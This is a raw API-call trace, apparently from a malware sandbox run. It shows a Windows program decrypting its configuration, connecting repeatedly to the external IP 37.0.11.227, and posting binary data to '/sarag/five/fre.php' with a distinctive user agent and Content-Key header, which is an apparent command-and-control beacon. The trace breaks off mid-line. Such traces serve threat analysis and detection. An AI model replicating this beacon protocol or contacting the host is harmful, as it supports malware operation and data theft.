[0247.394] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0247.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.395] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0247.396] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.396] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0247.396] GetProcessHeap () returned 0x690000 [0247.397] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0247.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.398] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0247.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.399] CryptDestroyKey (hKey=0x69d028) returned 1 [0247.399] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.399] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0247.399] GetProcessHeap () returned 0x690000 [0247.400] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0247.400] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.401] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0247.401] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.401] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0247.402] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.408] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0247.409] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.409] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0247.409] GetProcessHeap () returned 0x690000 [0247.409] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0247.409] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0247.410] GetProcessHeap () returned 0x690000 [0247.410] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0247.411] GetProcessHeap () returned 0x690000 [0247.411] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0247.411] GetProcessHeap () returned 0x690000 [0247.412] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0247.412] GetProcessHeap () returned 0x690000 [0247.412] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0247.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.413] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0247.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.419] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0247.425] GetProcessHeap () returned 0x690000 [0247.427] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0247.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.428] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0247.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.429] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0247.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.430] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0247.430] GetProcessHeap () returned 0x690000 [0247.430] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0247.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.431] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0247.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.432] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0247.433] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.433] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0247.433] GetProcessHeap () returned 0x690000 [0247.433] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0247.434] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.434] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0247.435] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.435] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0247.435] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.436] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0247.436] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.437] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0247.437] GetProcessHeap () returned 0x690000 [0247.437] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0247.437] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0247.437] GetProcessHeap () returned 0x690000 [0247.437] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0247.437] socket (af=2, type=1, protocol=6) returned 0x6cc [0247.437] connect (s=0x6cc, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0247.466] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0247.466] GetProcessHeap () returned 0x690000 [0247.466] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0247.466] GetProcessHeap () returned 0x690000 [0247.466] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0247.466] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0247.467] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0247.467] GetProcessHeap () returned 0x690000 [0247.467] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0247.467] GetProcessHeap () returned 0x690000 [0247.468] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0247.468] GetProcessHeap () returned 0x690000 [0247.468] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0247.468] GetProcessHeap () returned 0x690000 [0247.468] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0247.468] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0247.469] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0247.469] GetProcessHeap () returned 0x690000 [0247.469] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0247.469] GetProcessHeap () returned 0x690000 [0247.470] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0247.470] send (s=0x6cc, buf=0x6ad508*, len=242, flags=0) returned 242 [0247.470] send (s=0x6cc, buf=0x6aba40*, len=159, flags=0) returned 159 [0247.470] GetProcessHeap () returned 0x690000 [0247.470] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0247.470] recv (in: s=0x6cc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0247.582] GetProcessHeap () returned 0x690000 [0247.583] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0247.583] GetProcessHeap () returned 0x690000 [0247.583] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0247.584] GetProcessHeap () returned 0x690000 [0247.584] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0247.584] GetProcessHeap () returned 0x690000 [0247.584] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0247.584] closesocket (s=0x6cc) returned 0 [0247.585] GetProcessHeap () returned 0x690000 [0247.585] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0247.585] GetProcessHeap () returned 0x690000 [0247.585] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0247.585] GetProcessHeap () returned 0x690000 [0247.585] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0247.585] GetProcessHeap () returned 0x690000 [0247.586] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0247.589] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1424) returned 0x6cc [0247.590] Sleep (dwMilliseconds=0xea60) [0247.592] GetProcessHeap () returned 0x690000 [0247.592] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0247.593] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.593] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0247.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.598] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0247.604] GetProcessHeap () returned 0x690000 [0247.604] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0247.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.605] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0247.605] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.605] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0247.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.606] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0247.606] GetProcessHeap () returned 0x690000 [0247.607] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0247.616] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.616] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0247.617] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.617] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0247.617] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.618] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0247.618] GetProcessHeap () returned 0x690000 [0247.618] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0247.618] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.619] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0247.619] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.620] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0247.620] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.620] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0247.621] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.621] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0247.621] GetProcessHeap () returned 0x690000 [0247.621] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0247.621] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0247.622] GetProcessHeap () returned 0x690000 [0247.622] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0247.622] GetProcessHeap () returned 0x690000 [0247.623] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0247.623] GetProcessHeap () returned 0x690000 [0247.623] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0247.624] GetProcessHeap () returned 0x690000 [0247.624] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0247.624] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.624] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0247.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.629] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0247.634] GetProcessHeap () returned 0x690000 [0247.634] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0247.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.635] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0247.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.636] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0247.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.637] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0247.637] GetProcessHeap () returned 0x690000 [0247.637] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0247.638] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.638] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0247.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.639] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0247.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.640] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0247.640] GetProcessHeap () returned 0x690000 [0247.640] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0247.641] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.641] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0247.641] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.642] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0247.642] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.643] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0247.643] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.643] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0247.643] GetProcessHeap () returned 0x690000 [0247.643] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0247.643] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0247.644] GetProcessHeap () returned 0x690000 [0247.644] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0247.644] socket (af=2, type=1, protocol=6) returned 0x6d0 [0247.644] connect (s=0x6d0, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0247.674] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0247.674] GetProcessHeap () returned 0x690000 [0247.674] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0247.674] GetProcessHeap () returned 0x690000 [0247.674] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0247.675] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0247.676] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0247.676] GetProcessHeap () returned 0x690000 [0247.676] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0247.676] GetProcessHeap () returned 0x690000 [0247.676] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0247.676] GetProcessHeap () returned 0x690000 [0247.676] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0247.676] GetProcessHeap () returned 0x690000 [0247.676] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0247.677] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0247.678] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0247.678] GetProcessHeap () returned 0x690000 [0247.678] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0247.678] GetProcessHeap () returned 0x690000 [0247.678] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0247.678] send (s=0x6d0, buf=0x6ad508*, len=242, flags=0) returned 242 [0247.678] send (s=0x6d0, buf=0x6aba40*, len=159, flags=0) returned 159 [0247.679] GetProcessHeap () returned 0x690000 [0247.679] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0247.679] recv (in: s=0x6d0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0247.753] GetProcessHeap () returned 0x690000 [0247.753] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0247.753] GetProcessHeap () returned 0x690000 [0247.754] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0247.754] GetProcessHeap () returned 0x690000 [0247.754] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0247.754] GetProcessHeap () returned 0x690000 [0247.754] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0247.755] closesocket (s=0x6d0) returned 0 [0247.756] GetProcessHeap () returned 0x690000 [0247.756] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0247.756] GetProcessHeap () returned 0x690000 [0247.756] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0247.756] GetProcessHeap () returned 0x690000 [0247.756] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0247.756] GetProcessHeap () returned 0x690000 [0247.757] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0247.757] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1428) returned 0x6d0 [0247.758] Sleep (dwMilliseconds=0xea60) [0247.760] GetProcessHeap () returned 0x690000 [0247.760] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0247.760] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.761] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0247.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.767] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0247.773] GetProcessHeap () returned 0x690000 [0247.773] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0247.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.774] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0247.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.775] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0247.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.776] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0247.776] GetProcessHeap () returned 0x690000 [0247.777] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0247.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.778] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0247.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.778] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0247.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.779] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 